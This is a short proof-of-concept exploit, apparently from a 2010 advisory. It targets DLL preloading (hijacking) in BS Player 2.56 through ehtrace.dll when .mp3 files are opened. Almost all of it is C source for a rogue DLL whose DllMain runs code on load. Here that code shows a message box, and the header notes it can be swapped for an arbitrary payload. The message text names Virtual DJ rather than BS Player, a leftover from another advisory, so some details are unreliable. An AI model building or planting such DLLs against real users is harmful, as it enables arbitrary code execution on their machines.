BS Player version 2.56 DLL hijacking exploit.
1138e666e26d184783548561e62217e74722851cbc6da3b4fc0a1c1b81932324
/*
Description: BS Player 2.56 vulnerable for another DLL Preloading on ehtrace.dll while loading .mp3 content.
Date: August 29, 2010
Author: <a href="http://www.classity.nl/">Classity Security Scans</a>
PoC: Displaying message box, but can be replaced by DLL with arbitrary payload.
*/
#include <windows.h>
#define DllExport __declspec (dllexport)
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
dll_pl();
return 0;
}
int dll_pl()
{
MessageBox(0, "Virtual DJ Vulnerable for DLL Preloading!", "DLL Message", MB_OK);
return 0;
}